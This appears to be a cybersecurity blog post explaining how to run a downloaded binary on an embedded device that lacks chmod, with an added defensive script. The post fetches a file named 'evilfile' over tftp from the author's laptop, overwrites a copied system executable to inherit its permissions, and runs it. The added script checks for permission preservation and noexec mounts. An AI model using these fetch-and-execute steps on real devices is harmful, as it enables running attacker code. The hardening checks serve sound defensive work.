blog of bosh mainly cybersec

What do you do when there's no chmod?

In this post, I note a method to run any binary on a device without needing to use chmod or any other program to make the binary executable.

What didn’t work

1) Setting executable permissions on my laptop, hoping tftp would preserve them while downloading — tftp did not keep the permissions.

2) Using umask — You can’t use umask to add permissions to a file because it can only remove permissions.

3) Doing the linker trick — This trick works with a glibc shared object! But unfortunately, the Hub uses uClibc, with which the trick doesn’t work.

I was stuck for a while, but I did a little thinking outside the box and was able to come up with a solution that worked.

What worked

Because /usr/bin/ was already filled with executable files, I tried just “borrowing” their permissions to run my own file. In my testing, I used /usr/bin/tw.

I first copied the tw binary to /tmp:

cp /usr/bin/tw /tmp/malfile

Then in /tmp, I would download whatever binary I wanted from my laptop using tftp:

tftp -g -r evilfile <ip>

Then, I used cat and piped the output into /tmp/malfile:

cat evilfile > malfile

The shell redirection truncates and rewrites the existing file instead of creating a new one, so this overwrites the malfile content but preserves its permissions. Now, all we have to do is run ./malfile!
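
Why the overwrite keeps the execute bit, and two checks for it, as an added example that is not part of the original post: it confirms that redirection reuses the inode and mode, lists executable files in a directory, and reports whether a path sits on a noexec mount. The function names are hypothetical, /bin/sh stands in for /usr/bin/tw, and the mount table is constructed.

```shell
#!/bin/sh
# Added example (not from the original post). Runs in a scratch directory.

# Print "<inode> <mode-string>" for a file (fields 1 and 2 of `ls -li`).
inode_and_mode() {
    ls -li "$1" | awk '{print $1, $2}'
}

# Overwrite dst with src by redirection, as in the post's cat step, and
# print "preserved" if dst kept its inode and mode, else "changed".
overwrite_keeps_mode() {
    src=$1 dst=$2
    before=$(inode_and_mode "$dst")
    cat "$src" > "$dst"   # truncates the existing inode; mode bits untouched
    after=$(inode_and_mode "$dst")
    [ "$before" = "$after" ] && echo preserved || echo changed
}

# Audit: list regular files under DIR that have any execute bit set.
list_executables() {
    find "$1" -xdev -type f \( -perm -100 -o -perm -010 -o -perm -001 \)
}

# Print "noexec" or "exec" for the mount holding DIR. TABLE is a file in
# /proc/mounts format (defaults to the live table); longest mount point wins.
mount_exec_policy() {
    awk -v dir="$1" '
        {
            mp = $2
            covers = (mp == "/" || dir == mp || index(dir, mp "/") == 1)
            if (covers && length(mp) >= length(best)) { best = mp; opts = $4 }
        }
        END { print ((("," opts ",") ~ /,noexec,/) ? "noexec" : "exec") }
    ' "${2:-/proc/mounts}"
}

demo() {
    d=$(mktemp -d) || return 1
    cp /bin/sh "$d/borrowed"                  # copy keeps the execute bits
    printf 'constructed sample\n' > "$d/new"  # harmless constructed content
    # Constructed mount table: the second entry is the hardened form.
    printf 'rootfs / squashfs ro 0 0\ntmpfs /tmp tmpfs rw,nosuid,noexec 0 0\n' > "$d/mounts"
    overwrite_keeps_mode "$d/new" "$d/borrowed"   # preserved
    list_executables "$d"                         # only .../borrowed
    mount_exec_policy /tmp/malfile "$d/mounts"    # noexec
    rm -rf "$d"
}
demo
```

With noexec on the mount, execve of a file stored there fails with EACCES regardless of its mode bits.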